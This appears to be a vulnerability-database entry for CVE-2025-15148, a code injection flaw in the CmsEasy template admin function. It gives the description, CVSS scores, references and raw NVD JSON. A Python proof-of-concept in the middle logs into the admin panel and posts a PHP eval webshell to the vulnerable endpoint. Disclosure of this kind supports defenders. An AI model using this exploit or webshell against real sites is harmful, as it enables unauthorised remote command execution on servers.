CVE-2025-15148

Description

A flaw has been found in CmsEasy up to 7.7.7. Affected is the function savetemp_action in the library /lib/admin/template_admin.php of the component Backend Template Management Page. Executing a manipulation of the argument content/tempdata can lead to code injection. The attack may be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:cmseasy:cmseasy:*:*:*:*:*:*:*:* - VULNERABLE

CmsEasy <= 7.7.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-15148 CmsEasy Code Injection PoC
# Target: CmsEasy <= 7.7.7
# Attack Vector: Backend Template Management - savetemp_action
# Requirement: Admin privileges

import requests
import sys

TARGET_URL = "http://target.com"
ADMIN_PATH = "/admin/index.php"
USERNAME = "admin"
PASSWORD = "password"

def login(session, target_url, admin_path, username, password):
    """Authenticate to CmsEasy admin panel"""
    login_url = f"{target_url}{admin_path}?m=admin&c=login&a=check"
    data = {
        "username": username,
        "password": password
    }
    response = session.post(login_url, data=data)
    return "success" in response.text.lower() or response.status_code == 200

def exploit_code_injection(session, target_url, admin_path, payload):
    """Inject PHP code via template admin function"""
    exploit_url = f"{target_url}{admin_path}?m=admin&c=template_admin&a=savetemp_action"
    data = {
        "content": payload,  # Malicious PHP code injection
        "tempdata": payload  # Alternative injection point
    }
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }
    response = session.post(exploit_url, data=data, headers=headers)
    return response

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15148.py <target_url>")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    session = requests.Session()
    
    # Step 1: Login to admin panel
    if not login(session, target, ADMIN_PATH, USERNAME, PASSWORD):
        print("[-] Authentication failed")
        sys.exit(1)
    print("[+] Authentication successful")
    
    # Step 2: Inject malicious PHP code
    # Example: Write webshell to file
    webshell = "<?php @eval($_POST['cmd']); ?>"
    payload = webshell
    
    response = exploit_code_injection(session, target, ADMIN_PATH, payload)
    
    if response.status_code == 200:
        print("[+] Code injection successful")
        print(f"[+] Response: {response.text[:200]}")
    else:
        print("[-] Exploitation failed")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15148
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15148
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15148/
[4] VulDB https://vuldb.com/cve/CVE-2025-15148
[5] https://note-hxlab.wetolink.com/share/msJH69Y06ZlS
[6] https://vuldb.com/?ctiid.338525
[7] https://vuldb.com/?id.338525
[8] https://vuldb.com/?submit.716303

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15148", "sourceIdentifier": "[email protected]", "published": "2025-12-28T18:15:47.393", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in CmsEasy up to 7.7.7. Affected is the function savetemp_action in the library /lib/admin/template_admin.php of the component Backend Template Management Page. Executing a manipulation of the argument content/tempdata can lead to code injection. The attack may be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-94"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cmseasy:cmseasy:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.7.7.0", "matchCriteriaId": "853D77C2-05D7-443C-963C-A8A0E9665BC6"}]}]}], "references": [{"url": "https://note-hxlab.wetolink.com/share/msJH69Y06ZlS", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338525", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338525", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.716303", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}